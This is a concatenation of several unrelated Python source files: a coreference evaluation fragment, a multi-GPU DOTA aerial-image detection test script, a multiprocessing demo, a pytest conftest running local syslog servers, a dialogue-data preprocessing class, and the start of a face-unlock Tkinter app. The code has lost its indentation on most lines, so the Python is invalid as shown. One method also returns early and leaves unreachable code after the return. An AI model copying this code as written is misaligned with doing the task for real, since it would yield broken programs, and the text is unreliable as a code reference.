evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
return predicted_clusters
def load_eval_data(self):
if self.eval_data is None:
def load_line(line):
example = json.loads(line)
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
self.eval_data = [load_line(l) for l in f.readlines()]
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in self.eval_data)
print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False):
self.load_eval_data()
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
losses = []
doc_keys = []
num_evaluated= 0
for example_num, (tensorized_example, example) in enumerate(self.eval_data):
_, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
# if tensorized_example[0].shape[0] <= 9:
# if keys is not None and example['doc_key'] in keys:
# print('Skipping...', example['doc_key'], tensorized_example[0].shape)
# continue
doc_keys.append(example['doc_key'])
loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
# losses.append(session.run(self.loss, feed_dict=feed_dict))
losses.append(loss)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
summary_dict = {}
# with open('doc_keys_512.txt', 'w') as f:
# for key in doc_keys:
# f.write(key + '\n')
if eval_mode:
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout )
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
summary_dict["Average F1 (conll)"] = average_f1
print("Average F1 (conll): {:.2f}%".format(average_f1))
p,r,f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
return util.make_summary(summary_dict), f
|
test_dota.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from data.io.image_preprocess import short_side_resize_for_inference_data
from libs.networks import build_whole_network
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, args, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,
target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN,
length_limitation=cfgs.IMG_MAX_LENGTH)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
        if restorer is not None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if 'P0016' not in img_path:
# continue
img = cv2.imread(img_path)
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
if imgH < args.h_len:
temp = np.zeros([args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = args.h_len
if imgW < args.w_len:
temp = np.zeros([imgH, args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = args.w_len
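            # Worked example (added): with the defaults h_len=600 and
            # h_overlap=150, an image of height 800 yields window starts
            # hh = 0 and 450; the second window clamps to hh_ = 800 - 600 = 200
            # so every crop stays inside the (possibly padded) image.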
for hh in range(0, imgH, args.h_len - args.h_overlap):
if imgH - hh - 1 < args.h_len:
hh_ = imgH - args.h_len
else:
hh_ = hh
for ww in range(0, imgW, args.w_len - args.w_overlap):
if imgW - ww - 1 < args.w_len:
ww_ = imgW - args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: src_img[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
det_boxes_r_ = backward_convert(det_boxes_r_, False)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0] = box_rotate[0] + ww_
box_rotate[1] = box_rotate[1] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.05, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r = np.array(tmp_boxes_r)
tmp = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r
tmp[:, -1] = np.array(tmp_score_r)
try:
inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r),
scores=np.array(tmp_score_r),
iou_threshold=threshold[LABEL_NAME_MAP[sub_class]],
max_output_size=500)
                except Exception:
                    # Note: rotate_gpu_nms computes the IoU of two identical rectangles as 0,
                    # so a small jitter is added below to avoid that degenerate case
jitter = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[LABEL_NAME_MAP[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(det_net, real_test_img_list, args, txt_name):
save_path = os.path.join('./test_dota', cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_indices = res['scores'] >= cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = res['boxes'][detected_indices]
detected_categories = res['labels'][detected_indices]
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = NAME_LABEL_MAP.keys()
write_handle = {}
tools.mkdir(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
rboxes = forward_convert(res['boxes'], with_label=False)
for i, rbox in enumerate(rboxes):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[LABEL_NAME_MAP[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def eval(num_imgs, args):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************'*3)
print('Already tested imgs:', img_filter)
print('****************************'*3)
fr.close()
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
    assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
                                        ' Note that we only support img formats of (.jpg, .png, .jpeg, .tif, .tiff)'
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
retinanet = build_whole_network.DetectionNetwork(base_network_name=cfgs.NET_NAME,
is_training=False)
test_dota(det_net=retinanet, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
if not args.show_box:
os.remove(txt_name)
def parse_args():
parser = argparse.ArgumentParser('evaluate the result.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=600, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=600, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=150, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=150, type=int)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
args=args)
|
another_basic_multiprocessing.py
|
import random
import multiprocessing
import time
PROCESSES = 5
def worker(number):
sleeping_time = random.randrange(1, 10)
time.sleep(sleeping_time)
print("I'm worker {} and I slept {} seconds".format(number, sleeping_time))
for process_number in range(PROCESSES):
process = multiprocessing.Process(target=worker, args=(process_number,))
process.start()
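# A hedged sketch (added, not part of the original script): the same loop with
# explicit joins, wrapped in a function so it does not run on import. Joining
# makes the parent block until every worker has finished; on platforms that use
# the "spawn" start method this kind of code also needs an
# `if __name__ == '__main__':` guard.
def run_workers_and_wait(n=PROCESSES):
    processes = [multiprocessing.Process(target=worker, args=(i,)) for i in range(n)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()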
|
conftest.py
|
# -*- coding: utf-8 -*-
"""Testing conf module."""
# standard library
import os
import threading
# third-party
import pytest
from falcon import testing
from .Custom.app import app_custom_logger
from .Null.app import app_null_logger
from .Rotating_Logger.app import app_rh_logger
from .Syslog.syslog_server import TestSyslogServers
# the log directory for all test cases
_LOG_DIRECTORY = os.path.join(os.getcwd(), 'log')
test_syslog = TestSyslogServers(address='0.0.0.0', log_directory=_LOG_DIRECTORY)
tcp_server = test_syslog.start_tcp_server(port=5141)
udp_server = test_syslog.start_udp_server(port=5140)
@pytest.fixture
def client_custom() -> testing.TestClient:
"""Create testing client fixture for logger app"""
return testing.TestClient(app_custom_logger)
@pytest.fixture
def client_null() -> testing.TestClient:
"""Create testing client fixture for logger app"""
return testing.TestClient(app_null_logger)
@pytest.fixture
def client_rh() -> testing.TestClient:
"""Create testing client fixture for logger app"""
return testing.TestClient(app_rh_logger)
@pytest.fixture
def client_sh_tcp() -> testing.TestClient:
"""Create testing client fixture for logger app"""
# import here so tcp server can be started first in pytest_configure
from .Syslog.app import app_sh_tcp_logger # pylint: disable=import-outside-toplevel
return testing.TestClient(app_sh_tcp_logger)
@pytest.fixture
def client_sh_udp() -> testing.TestClient:
"""Create testing client fixture for logger app"""
# import here so udp server can be started first in pytest_configure
from .Syslog.app import app_sh_udp_logger # pylint: disable=import-outside-toplevel
return testing.TestClient(app_sh_udp_logger)
@pytest.fixture
def log_directory() -> str:
"""Return the log directory."""
return _LOG_DIRECTORY
def pytest_configure() -> None:
"""Clear the log directory after tests are complete"""
# start TCP syslog servers
tcp_thread = threading.Thread(name='tcp_server', target=tcp_server.serve_forever, daemon=True)
tcp_thread.start()
# start UDP syslog servers
udp_thread = threading.Thread(name='udp_server', target=udp_server.serve_forever, daemon=True)
udp_thread.start()
def pytest_unconfigure(config: object) -> None: # pylint: disable=unused-argument
"""Clear the log directory after tests are complete"""
if os.path.isdir(_LOG_DIRECTORY):
for log_file in os.listdir(_LOG_DIRECTORY):
file_path = os.path.join(_LOG_DIRECTORY, log_file)
if os.path.isfile(file_path):
os.unlink(file_path)
os.rmdir(_LOG_DIRECTORY)
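# Example test using the fixtures above (sketch; the route and assertion are illustrative):
#
#   def test_custom_logger_writes_log(client_custom, log_directory):
#       client_custom.simulate_get('/')
#       assert os.path.isdir(log_directory)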
|
sampleConduct.py
|
# -*- coding: utf-8 -*-
# @Author: gunjianpan
# @Date: 2018-11-20 16:20:41
# @Last Modified by: gunjianpan
# @Last Modified time: 2018-12-31 12:24:09
import codecs
import gc
import logging
import numpy as np
import pickle
import queue
import random
import threading
from gensim.models import Word2Vec  # used by preWord2vec (gensim < 4.0 API: size= kwarg)
from utils.utils import begin_time, end_time, flatten, spend_time, load_bigger, unifom_vector, unique_randomint
logger = logging.getLogger('relevance_logger')
class SampleConduct(object):
"""
1. multi to one line
2. generate negative sample
"""
def __init__(self):
self.content = {}
self.response = {}
self.pre = {}
self.origin_sample = []
self.test = []
self.word2vec = []
self.wordresult = {}
self.dev = []
self.train = []
def origin_sample_master(self, input_file, output1_file, output2_file, block_size=100000, valnum=10000):
"""
        the master of multi-threading for getting the origin sample
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
self.origin_sample = f.readlines()
threadings = []
num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
for block in range(int(num / block_size) + 1):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block,))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
for work in threadings:
work.start()
for work in threadings:
work.join()
content = [self.content[k] for k in sorted(self.content.keys())]
self.content = sum(content, [])
response = [self.response[k] for k in sorted(self.response.keys())]
self.response = sum(response, [])
# pre = [self.pre[k] for k in sorted(self.pre.keys())]
# self.pre = sum(pre, [])
totalnum = len(self.response)
for index in range(len(self.content)):
context = self.content[index]
if index <= valnum:
self.dev.append("1#" + context + self.response[index])
else:
self.train.append("1#" + context + self.response[index])
otherindexs = np.random.randint(0, totalnum, 2)
for otherindex in otherindexs:
while otherindex == index:
otherindex = np.random.randint(0, totalnum, 1)[0]
if index <= valnum:
self.dev.append("0#" + context + self.response[otherindex])
else:
self.train.append(
"0#" + context + self.response[otherindex])
pickle.dump(self.train, open(output1_file, "wb"))
pickle.dump(self.dev, open(output2_file, "wb"))
end_time(version)
def onetime_master(self, input_file, output_file, block_size=900000, test_size=2000):
"""
by numpy
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
self.origin_sample = f.readlines()
threadings = []
        num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
block_num = int(num / block_size) + 1
print('Thread Begin. ', num)
for block in range(block_num):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block,))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
print('point 1')
for work in threadings:
work.start()
for work in threadings:
work.join()
print('Thread Over.')
return self.content, self.response
content = np.hstack(np.array(list(self.content.values())))
totalnum = len(content)
print(totalnum)
randomIndexs = unique_randomint(0, totalnum, test_size)
otherIndexs = np.setdiff1d(np.arange(totalnum), randomIndexs)
pre_content = content[otherIndexs]
test_content = content[randomIndexs]
del content
gc.collect()
response = np.hstack(np.array(list(self.response.values())))
test_response = [response[index] + '\n' + list2str(
response[unique_randomint(0, totalnum, 9, [index])]) + '\n' for index in randomIndexs]
otherIndexs = np.setdiff1d(np.arange(totalnum), randomIndexs)
pre_response = response[otherIndexs]
max_dtype = max(pre_content.dtype, pre_response.dtype)
pre_next = pre_content.astype(
max_dtype) + pre_response.astype(max_dtype)
with open(output_file + 'seq_replies.txt', 'wb') as f:
f.write(list2str(test_response))
with open(output_file + 'seq_context.txt', 'wb') as f:
f.write(list2str(test_content))
with open(output_file + 'train.txt', 'wb') as f:
f.write(list2str(pre_next))
end_time(version)
def twotime_master(self, input_file, output_file, block_size=900000, test_size=2000):
"""
by not using numpy
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
self.origin_sample = f.readlines()
threadings = []
        num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
block_num = int(num / block_size) + 1
print('Thread Begin. ', num)
for block in range(block_num):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block,))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
print('point 1')
for work in threadings:
work.start()
for work in threadings:
work.join()
print('Thread Over.')
content = sum(list(self.content.values()), [])
response = sum(list(self.response.values()), [])
totalnum = len(content)
print(totalnum)
randomIndexs = unique_randomint(0, totalnum, test_size)
otherIndexs = np.setdiff1d(np.arange(totalnum), randomIndexs)
pre_next = [content[index] + response[index] for index in otherIndexs]
print(len(randomIndexs))
test_content = []
test_content = [content[index] for index in randomIndexs]
print(len(test_content))
test_response = []
with open(output_file + 'seq_replies.txt', 'w') as f:
for index in randomIndexs:
f.write(response[index].replace(
'\r\n', '').replace('\n', '') + '\n')
tempIndexs = unique_randomint(0, totalnum, 9, [index])[0:9]
for idx, temp in enumerate(tempIndexs):
if idx == 8:
f.write(
response[temp].replace('\r\n', '').replace('\n', '') + '\n\n')
else:
f.write(response[temp].replace(
'\r\n', '').replace('\n', '') + '\n')
print(len(test_response))
print(len(list2str(test_response).split('\n')))
# with open(output_file + 'seq_replies.txt', 'w') as f:
# f.write(list2str(test_response))
with open(output_file + 'seq_context.txt', 'w') as f:
f.write(list2str(test_content))
with open(output_file + 'train.txt', 'w') as f:
f.write(list2str(pre_next))
end_time(version)
def origin_test_master(self, input_file, output_file, block_size=100000, test_size=2000):
"""
        the master of multi-threading for getting the origin sample
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
self.origin_sample = f.readlines()
threadings = []
num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
for block in range(int(num / block_size) + 1):
while self.origin_sample[end] != '\r\n' and end < num - 1:
end += 1
work = threading.Thread(
target=self.origin_sample_agent, args=(start, end, block, ))
threadings.append(work)
start = end + 1
end = min(num - 1, block_size * (block + 1))
for work in threadings:
work.start()
for work in threadings:
work.join()
content = [self.content[k] for k in sorted(self.content.keys())]
self.content = sum(content, [])
response = [self.response[k] for k in sorted(self.response.keys())]
self.response = sum(response, [])
totalnum = len(self.content)
randomlists = np.random.randint(0, totalnum, test_size)
for index in randomlists:
temp_context = self.content[index][:-
1].replace('\n', '[SEP]') + '#'
self.test.append("1#" + temp_context + self.response[index][:-1])
otherindexs = np.random.randint(0, totalnum, 9)
for otherindex in otherindexs:
while otherindex == index:
otherindex = np.random.randint(0, totalnum, 1)[0]
self.test.append("0#" + temp_context +
self.response[otherindex][:-1])
pickle.dump(self.test, open(output_file, 'wb'))
end_time(version)
def origin_sample_agent(self, start, end, block):
"""
        the agent of multi-threading for getting the origin sample
"""
temp_context = ''
last_index = ''
content = []
response = []
pre = []
num = 0
for index in range(start, end):
tempword = self.origin_sample[index]
if tempword == '\r\n':
num += 1
content.append(temp_context)
response.append(last_index)
# pre.append(temp_context + last_index)
temp_context = ''
last_index = ''
else:
if len(last_index):
temp_context += last_index
last_index = tempword[:-1].strip() + '\n'
self.content[block] = content
self.response[block] = response
# self.pre[block] = pre
def origin_sample_direct(self, input_file, output_file):
"""
        origin sample direct, no threading
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
temp_context = ''
last_index = ''
content = []
response = []
pre = []
for tempword in f:
if tempword == '\r\n':
content.append(temp_context)
response.append(last_index)
pre.append("1#" + temp_context + last_index)
temp_context = ''
else:
if len(last_index):
temp_context += (last_index + '#')
last_index = tempword[:-1].strip()
pickle.dump(pre, open(output_file, "wb"))
end_time(version)
def origin_result_direct(self, input_file1, input_file2, output_file):
"""
        origin sample direct, no threading
"""
version = begin_time()
pre = []
dataset = []
with codecs.open(input_file1, 'r', 'utf-8') as f:
temp_context = ''
last_index = ''
for tempword in f:
if tempword == '\r\n':
pre.append("1#" + temp_context + last_index)
temp_context = ''
last_index = ''
else:
if len(last_index):
temp_context += (last_index + '#')
last_index = tempword[:-1].strip()
with codecs.open(input_file2, 'r', 'utf-8') as f:
temp_context = []
index = 0
totalnum = len(pre)
for tempword in f:
if tempword == '\r\n':
if len(temp_context) < 9:
continue
elif len(temp_context) == 9:
if index < totalnum:
dataset.append(pre[index] + '#' + temp_context[0])
index += 1
temp_context = []
else:
index += 1
temp_context = []
else:
temp_context.append(tempword[:-1].strip())
if index < totalnum:
dataset.append(pre[index] + '#' +
tempword[:-1].replace(u'\ufeff', '').strip())
pickle.dump([pre, dataset], open(output_file, "wb"))
end_time(version)
def calculate_result(self, input_file, output_file, block_size=10):
"""
calculate result
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
with codecs.open(output_file, 'w') as outf:
results = f.readlines()
                for index in range(int(len(results) / block_size)):
                    pre = results[index * block_size:(index + 1) * block_size]
                    temp_index = np.array(pre, dtype=np.float64).argmax()
                    outf.write(str(temp_index) + '\n')
end_time(version)
def calculate_test(self, input_file, block_size=10):
"""
calculate result
"""
version = begin_time()
with codecs.open(input_file, 'r', 'utf-8') as f:
results = f.readlines()
totalnum = int(len(results))
correctnum = 0
top3num = 0
for index in range(int(totalnum / block_size)):
                pre = results[index * block_size:(index + 1) * block_size]
                scores = np.array(pre, dtype=np.float64)
                temp_index = scores.argmax()
                top3 = scores.argsort()[-3:][::-1]
if not temp_index:
correctnum += 1
if 0 in top3:
top3num += 1
print(correctnum, top3num, int(totalnum / block_size), spend_time(version), str(
correctnum / int(totalnum / block_size))[:5], str(top3num / int(totalnum / block_size))[:5])
return str(correctnum / int(totalnum / block_size))[:5]
def embedding_test_master(self, input_file, embedding_file, block_size=10000):
"""
        the master of multi-threading for testing with the embedding model
"""
version = begin_time()
self.word2vec = load_bigger(embedding_file)
self.origin_sample = load_bigger(input_file)
threadings = queue.Queue()
waitthreadings = queue.Queue()
num = len(self.origin_sample)
start = 0
end = min(block_size, num - 1)
for block in range(int(num / block_size) + 1):
work = threading.Thread(
target=self.embedding_test_agent, args=(start, end, block,))
threadings.put(work)
start = end + 1
end = min(num - 1, block_size * (block + 2))
while not threadings.empty():
tempwork = threadings.get()
tempwork.start()
waitthreadings.put(tempwork)
while not waitthreadings.empty():
waitthreadings.get().join()
result = [self.wordresult[k] for k in sorted(self.wordresult.keys())]
results = sum(result, [])
totalnum = int(len(results))
correctnum = 0
top3num = 0
block_sizes = 10
for index in range(int(totalnum / block_sizes)):
pre = results[index * block_sizes:(index + 1) * block_sizes]
temp_index = np.array(pre).argmax()
top3 = np.array(pre).argsort()[-3:][::-1]
if not temp_index:
correctnum += 1
if 0 in top3:
top3num += 1
print(correctnum, top3num, int(totalnum / block_sizes), spend_time(version), str(
correctnum / int(totalnum / block_sizes))[:5], str(top3num / int(totalnum / block_sizes))[:5])
end_time(version)
def embedding_test_agent(self, start, end, block):
"""
        the agent of multi-threading for testing with the embedding model
"""
result = []
origin_sample = self.origin_sample
word2vec = self.word2vec
for index in range(start, end):
tempword = origin_sample[index].replace("\n", "")
parts = tempword.strip().split('#')
context = np.zeros(200)
reply = np.zeros(200)
for i in range(1, len(parts) - 1, 1):
words = parts[i].split()
for word in words:
if word in word2vec:
context += word2vec[word]
for word in parts[-1].split():
if word in word2vec:
reply += word2vec[word]
result.append(np.dot(
context, reply) / (np.linalg.norm(context, ord=2) * np.linalg.norm(reply, ord=2)))
self.wordresult[block] = result
def papp(index):
tempword = origin_sample[index]
parts = tempword.strip().split('#')
context = np.zeros(200)
reply = np.zeros(200)
for i in range(1, len(parts) - 1, 1):
words = parts[i].split()
for word in words:
if word in word2vec:
context += word2vec[word]
for word in parts[-1].split():
if word in word2vec:
reply += word2vec[word]
return np.dot(context, reply) / (np.linalg.norm(context, ord=2) * np.linalg.norm(reply, ord=2))
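# Helper sketch: the score computed in embedding_test_agent is the cosine
# similarity between the bag-of-words embedding of the context and the reply.
def cosine_similarity(vec_a, vec_b):
    """Cosine similarity of two dense vectors (nan if either vector is all zeros)."""
    return np.dot(vec_a, vec_b) / (np.linalg.norm(vec_a, ord=2) * np.linalg.norm(vec_b, ord=2))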
class GetWords(object):
"""
word2vec agent
"""
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
with open(self.dirname, 'r') as f:
wordLists = f.readlines()
for index in wordLists:
yield index.split()
def list2str(lists):
"""
list to str
"""
return str(list(lists)).replace('\'', '').replace('\\n', '\n').replace(', ', '\n')[1:-1]
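# e.g. list2str(['a', 'b', 'c']) returns 'a\nb\nc' (items joined by newlines,
# with literal '\n' escape sequences also converted to real newlines).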
def preWord2vec(input_file, output_file):
"""
word bag construction
"""
version = begin_time()
logging.basicConfig(
format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
sentences = GetWords(input_file)
model = Word2Vec(sentences, workers=100, min_count=5, size=200)
model.save(output_file)
end_time(version)
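# Example usage (sketch; file paths are illustrative):
#   sc = SampleConduct()
#   sc.origin_sample_master('data/dialogue.txt', 'data/train.pkl', 'data/dev.pkl')
#   preWord2vec('data/corpus.txt', 'data/word2vec.model')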
|
SECURITY.py
|
from tkinter import *
from tkinter import ttk
from PIL import Image, ImageTk
import cv2
import numpy as np
import os
from os.path import isfile, join
from threading import Thread
from userHandler import UserData
import FACE_UNLOCKER as FU
background, textColor = 'black', '#F6FAFB'
background, textColor = textColor, background
avatarChoosen = 0
choosedAvtrImage = None
user_name = ''
user_gender = ''
face_classifier = cv2.CascadeClassifier('Cascade/haarcascade_frontalface_default.xml')
if face_classifier.empty():
    # CascadeClassifier does not raise on a missing file, so check explicitly
    print('Cascade File is missing...')
    raise SystemExit
if not os.path.exists('userData'):
    os.mkdir('userData')
if not os.path.exists('userData/faceData'):
    os.mkdir('userData/faceData')
###### ROOT1 ########
def startLogin():
try:
result = FU.startDetecting()
if result:
user = UserData()
user.extractData()
userName = user.getName().split()[0]
welcLbl['text'] = 'Hi '+userName+',\nWelcome to the world of\nScience & Technology'
loginStatus['text'] = 'UNLOCKED'
loginStatus['fg'] = 'green'
faceStatus['text']='(Logged In)'
os.system('python GUIASSISTANT.py')
else:
print('Error Occurred')
except Exception as e:
print(e)
####### ROOT2 ########
def trainFace():
data_path = 'userData/faceData/'
onlyfiles = [f for f in os.listdir(data_path) if isfile(join(data_path, f))]
Training_data = []
Labels = []
for i, files in enumerate(onlyfiles):
image_path = data_path + onlyfiles[i]
images = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
Training_data.append(np.asarray(images, dtype=np.uint8))
Labels.append(i)
